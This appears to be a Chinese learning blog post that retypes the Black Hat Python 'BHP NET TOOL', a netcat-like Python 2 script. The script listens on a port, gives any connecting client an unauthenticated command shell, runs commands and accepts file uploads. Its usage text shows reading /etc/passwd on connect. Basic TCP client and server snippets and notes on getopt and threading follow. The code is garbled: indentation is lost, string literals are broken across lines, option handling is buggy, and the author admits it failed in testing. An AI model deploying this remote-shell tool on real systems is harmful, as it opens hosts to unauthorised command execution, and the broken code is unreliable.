通过黑客python编程写的第一个脚本, 实现监听、连接、代码是写了上传功能、执行文件功能、但是测试是不成功的。
通过这个脚本、了解几个模块 threading,getopt、subprocess、socket 、sys ;
写代码过程中,发现boolean 首字母要大写 正确写法:True、False 错误写法:true、false 、还有一些函数字母拼错
#! /usr/bin/env python
#coding=utf-8
import sys
import socket
import getopt
import threading
import subprocess
listen = False
command = False
upload = False
execute =""
target =""
upload_destination = ""
port = 0
def usage():
print "BHP NET TOOL"
print
print "usage bhpnet.py -t target_host -p -port"
print "-l -listen -listen on [host]:[port]for incoming connects"
print "-e execute=file_to_run -execute the given file upon receiving a connects"
print "-c command -initialize a command shell"
print "-u -upload_destination -upon recviving connections upload a file and write to destination"
print
print
print "Examples:"
print "bhpnet.py -t 192.168.0.1 -p 5555 -l -c"
print "bhpnet.py -t 192.168.0.1 -p 5555 -l -e="cat /etc/passwd""
print "echo 'ABCDEFGHI'| ./bhpnet.py -t 192.168.11.12 -p 135"
sys.exit()
def client_sender(buffer):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
#连接到目标主机
client.connect((target,port))
if len(buffer):
client.send(buffer)
while True:
#现在等待数据回传
recv_len = 1
response = ""
while recv_len:
data = client.recv(4096)
recv_len = len(data)
response += data
if recv_len < 4096:
break
print response,
#等待更多的输入
buffer = raw_input("")
buffer += "
"
#发送出去
client.send(buffer)
except:
print "[*] Exception! Exiting."
#关闭连接
client.close()
def server_loop():
global target
if not len(target):
target="0.0.0.0"
server=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
server.bind((target,port))
server.listen(5)
while True:
client_socket,addr=server.accept()
#分拆一个线程处理新的客户端
client_thread=threading.Thread(target=client_handler,args=(client_socket,))
client_thread.start()
def run_command(command):
command=command.rstrip()
try:
output=subprocess.check_output(command,stderr=subprocess.STDOUT,shell=True)
except:
output="failed to execute command.
"
#将输出发送
return output
def client_handler(client_socket):
global upload
global execute
global command
if len(upload_destination):
file_buffer=""
while True:
data=client_socket.recv(1024)
if not data:
break
else:
file_buffer+=data
try:
file_descript=open(upload_destination,"wb")
file_descript.write(file_buffer)
file_descript.close()
client_socket.send("sucessfully saved file to %s
"%upload_destination)
except:
client_socket.send("falied to save file to %s
"%upload_destination)
#检测命令执行
if len(execute):
#运行命令
output = run_command(execute)
client_socket.send(output)
#如果需要一个命令行shell,那么我们进入另一个循环
if command:
while True:
#跳出一个窗口
client_socket.send("<BHP:#> ")
#现在我们接收文件直到发现换行符(enter key)
cmd_buffer = ""
while "
" not in cmd_buffer:
cmd_buffer += client_socket.recv(1024)
#返还命令输出
response = run_command(cmd_buffer)
#返回响应数据
client_socket.send(response)
def main():
global listen
global command
global upload
global execute
global target
global upload_destination
global port
if not len(sys.argv[1:]):
usage()
#读取命令行选项
try:
opts,args =getopt.getopt(sys.argv[1:], "hle:t:p:cu:",["help","listen","execute","target","port","command","upload"])
except getopt.GetoptError as err:
print str(err)
usage()
for o,a in opts:
if o in ("-h","--help"):
usage()
elif o in ("-l","-listen"):
listen = True
elif o in ("-c","commandshell"):
command= True
elif o in ("-u","--upload"):
upload_destination = a
elif o in ("-t","--target"):
target=a
elif o in ("-p","--port"):
port=int(a)
else:
assert False,"unhandled option"
if not listen and len(target) and port >0:
#从命令行读取内存数据
#这里将阻塞,所以不在向标准输入发送数据发送 CTRL -D
buffer = sys.stdin.read()
#发送数据
client_sender(buffer)
#我们开始监听并准备上传文件、执行命令
#放置一个反弹shell
#取决于上面的命令选项
if listen:
server_loop()
main()
tcp 服务端:
# -*- coding: UTF-8 -* from socket import * from time import ctime HOST = '127.0.0.1' PORT = 21567 BUFSIZ = 1024 ADDR = (HOST,PORT) tcpSerSock = socket(AF_INET,SOCK_STREAM) #s.bind()将地址(主机名,端口号)绑定到套接字 tcpSerSock.bind(ADDR) #s.listen() 设置并启动TCP监听器,“5”表示连接欸被转接或拒绝之前,传入链接请求的最大请求数 tcpSerSock.listen(5) #bytes 函数返回一个新的 bytes 对象,该对象是一个 0 <= x < 256 区间内的整数不可变序列。它是 bytearray 的不可变版本 while True: print('waiting for connection...') #s.accept() 被动接收TCP客户端连接,一直等待直到连接到达(阻塞) tcpCliSock, addr = tcpSerSock.accept() print('...connected from:', addr) while True: data = tcpCliSock.recv(BUFSIZ) print(type(data)) ctime = ctime().encode() if not data: #break语句用来终止循环语句,即循环条件没有False条件或者序列还没被完全递归完,也会停止执行循环语句。如果您使用嵌套循环,break语句将停止执行最深层的循环,并开始执行下一行代码 break tcpCliSock.send(ctime) #tcpCliSock.send('[%s] %s' %(ctime,data)) #tcpCliSock.send('[%s] %s' %(bytes(ctime(),'UTF-8'),data)) tcpCliSock.close() tcpSerSock.close()
tcp 客户端
import socket target_host="127.0.0.1" target_port=9999 client=socket.socket(socket.AF_INET, socket.SOCK_STREAM) client.connect((target_host,target_port)) data="GET /HTTP1.1 HOST:baidu.com " client.send(data.encode()) response=client.recv(4096).decode() print (response)
getopt
try: opts,args =getopt.getopt(sys.argv[1:], "hle:t:p:cu:",["help","listen","execute","target","port","command","upload"]) except getopt.GetoptError as err: print str(err) usage() for o,a in opts: if o in ("-h","--help"): usage() elif o in ("-l","-listen"): listen = True elif o in ("-c","commandshell"): command= True elif o in ("-u","--upload"): upload_destination = a elif o in ("-t","--target"): target=a elif o in ("-p","--port"): port=int(a) else: assert False,"unhandled option"
getopt 详解:
getopt.getopt(args,shortopts,longopts)
args 接收的参数、 shortopts 短参数、longopts长参数
args 可以通过 sys.argv[1:0]获得
sys.argv[0] 是当前代码本身。
threading 详解:
def server_loop(): global target global port #如果没有定义目标,那么我们监听所有端口 if not len(target): target = "0.0.0.0" server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.bind((target,port)) server.listen(5) while True: client_socket, addr = server.accept() #分拆一个线程处理新的客户端 client_thread = threading.Thread(target=client_handler,args=(client_socket,)) client_thread.start()
target 一般接的的函数、args 接的元组类型,后面要加“,”